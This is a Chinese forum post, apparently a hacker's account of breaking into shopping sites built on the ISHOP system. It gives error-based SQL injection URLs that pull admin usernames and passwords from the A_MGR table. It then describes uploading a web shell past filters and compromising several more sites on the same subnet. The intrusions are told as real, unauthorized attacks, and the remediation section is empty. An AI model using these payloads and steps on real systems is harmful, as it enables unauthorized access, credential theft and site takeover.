ISHOP商场建站系统注入漏洞
发现一个注入点http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
习惯性的加’having1=1--
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
0
爆出Diary_A.dl_Title(这时候很激动啊)
那么继续
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
继续,一直爆下去
爆到几个字段和表段 但是没找到需要的管理用户的字段
蛋疼了 怎么办 然后去后台登陆页看源码
0
Input name= “ADUID”
Input name= “ADPWD”
很幸运 找到了字段那就继续
找到之后开始爆用户
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
爆密码
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
测试了下 这个注入点只能爆到文章哪里的表
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
473
进后台
发现几个上传点 有的地方不能上传 而且防止恶意代码
没办法 各种百度各种找大牛 找到一只好像可以突破的马
在系统管理那里直接上传 不过没有显示地址
再上传一次 抓包 搞定OK
472
晚上不行了 去睡觉。。。
第二天刚起床 闲的没事做继续日站吧
找个站 就把这个站的旁c扫了下
发现c段也有一个购物站 ,然后还和这个站的模板差不多
就找到会员登录口测试
'and (select top 1 MGR_UID from A_MGR)>0—
果断爆到了 这时候我很激动 通杀
再次翻c段
翻出几个站 都成功拿下
修复方案:
他们比我专业
页:
[1]